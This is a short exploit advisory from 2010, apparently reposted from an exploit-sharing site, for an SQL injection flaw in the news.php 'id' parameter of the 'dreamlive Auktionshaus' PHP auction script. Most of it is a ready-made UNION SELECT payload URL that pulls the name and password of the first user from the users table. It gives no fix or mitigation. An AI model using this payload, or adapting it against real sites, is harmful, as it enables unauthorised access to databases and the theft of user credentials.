Home / os / winme

dreamlive Auktionshaus script news.php (id) SQL Injection Vu

Posted on 12 March 2010

=======================================================================
dreamlive Auktionshaus script news.php (id) SQL Injection Vulnerability
=======================================================================

----------------------------Information------------------------------------------------
+Name : dreamlive Auktionshaus script news.php (id) SQL Injection
+Autor : Easy Laster
+Date   : 12.03.2010
+Script  : dreamlive Auktionshaus script
+Language :PHP
+Discovered by Easy Laster

----------------------------------------------------------------------------------------
+Vulnerability : http://server/auktionshaus/news.php?id=
+Exploitable   : http://server/auktionshaus/news.php?id=999999+union+select+1,2,
concat(name,0x3a,password),4,5+from+users+where+id=1--
-----------------------------------------------------------------------------------------


# ~  - [ [ : Inj3ct0r : ] ]

 

TOP